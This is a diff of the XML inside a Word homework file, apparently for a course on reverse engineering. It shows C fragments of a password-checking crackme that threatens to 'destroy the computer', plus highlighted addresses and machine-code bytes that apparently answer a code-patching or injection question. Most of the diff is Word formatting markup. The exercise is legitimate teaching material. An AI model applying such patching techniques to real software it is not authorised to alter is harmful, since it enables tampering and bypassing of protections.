+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2528,6 +2541,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2556,6 +2570,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2586,6 +2601,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2652,8 +2668,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c = *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2732,6 +2760,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2752,6 +2781,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2800,6 +2830,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2820,6 +2851,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2904,8 +2936,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c){</w:t>
-      </w:r>
+        <w:t>(c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2952,7 +2996,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; 1</w:t>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2964,6 +3019,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3042,6 +3098,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3062,6 +3119,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3116,8 +3174,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s++;</w:t>
-      </w:r>
+        <w:t>          s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3212,8 +3282,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sum;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>sum;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3301,6 +3383,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3320,7 +3403,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(char* s){</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3358,8 +3452,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>char* copy = s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">char* copy = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3440,6 +3546,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3460,6 +3567,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3518,6 +3626,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3538,6 +3647,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3592,8 +3702,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>     s = copy;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">     s = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>copy;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3642,6 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3662,6 +3785,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3690,6 +3814,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3710,6 +3835,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3826,7 +3952,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a'</w:t>
+        <w:t>'a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3838,6 +3975,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3866,6 +4004,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3884,7 +4023,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3994,6 +4144,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4014,6 +4165,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4090,6 +4242,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4108,7 +4261,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(y &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4198,6 +4362,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4218,6 +4383,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4304,6 +4470,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> 26y + </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4324,6 +4491,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4350,8 +4518,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s++;</w:t>
-      </w:r>
+        <w:t>         s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4446,7 +4626,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>y == hash</w:t>
+        <w:t xml:space="preserve">y == </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4458,6 +4649,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4858,7 +5050,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main(){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4901,8 +5115,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> password[</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>password[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4947,6 +5173,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4968,6 +5195,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5012,6 +5240,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5033,6 +5262,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5116,8 +5346,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(password)){</w:t>
-      </w:r>
+        <w:t>(password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>)){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5142,6 +5384,7 @@
         <w:t xml:space="preserve">        </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5163,6 +5406,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5181,8 +5425,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password);</w:t>
-      </w:r>
+        <w:t>, password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5226,6 +5482,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5246,6 +5503,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5293,6 +5551,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5314,6 +5573,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5324,6 +5584,7 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5334,6 +5595,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5375,7 +5637,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5397,6 +5670,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6946,6 +7220,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x4008f0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6972,9 +7257,21 @@
                 <w:rFonts w:cs="Arial"/>
                 <w:b w:val="0"/>
                 <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t xml:space="preserve">4c 01 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>ff c3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7101,6 +7398,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x400e10</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7121,6 +7429,72 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">55 48 89 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>e</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>ff</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> d0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,76 +453,56 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> טאוב</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מצאתם על הרצפה דיסק-און-קי חשוד</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>. על הדיסק-און-קי</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
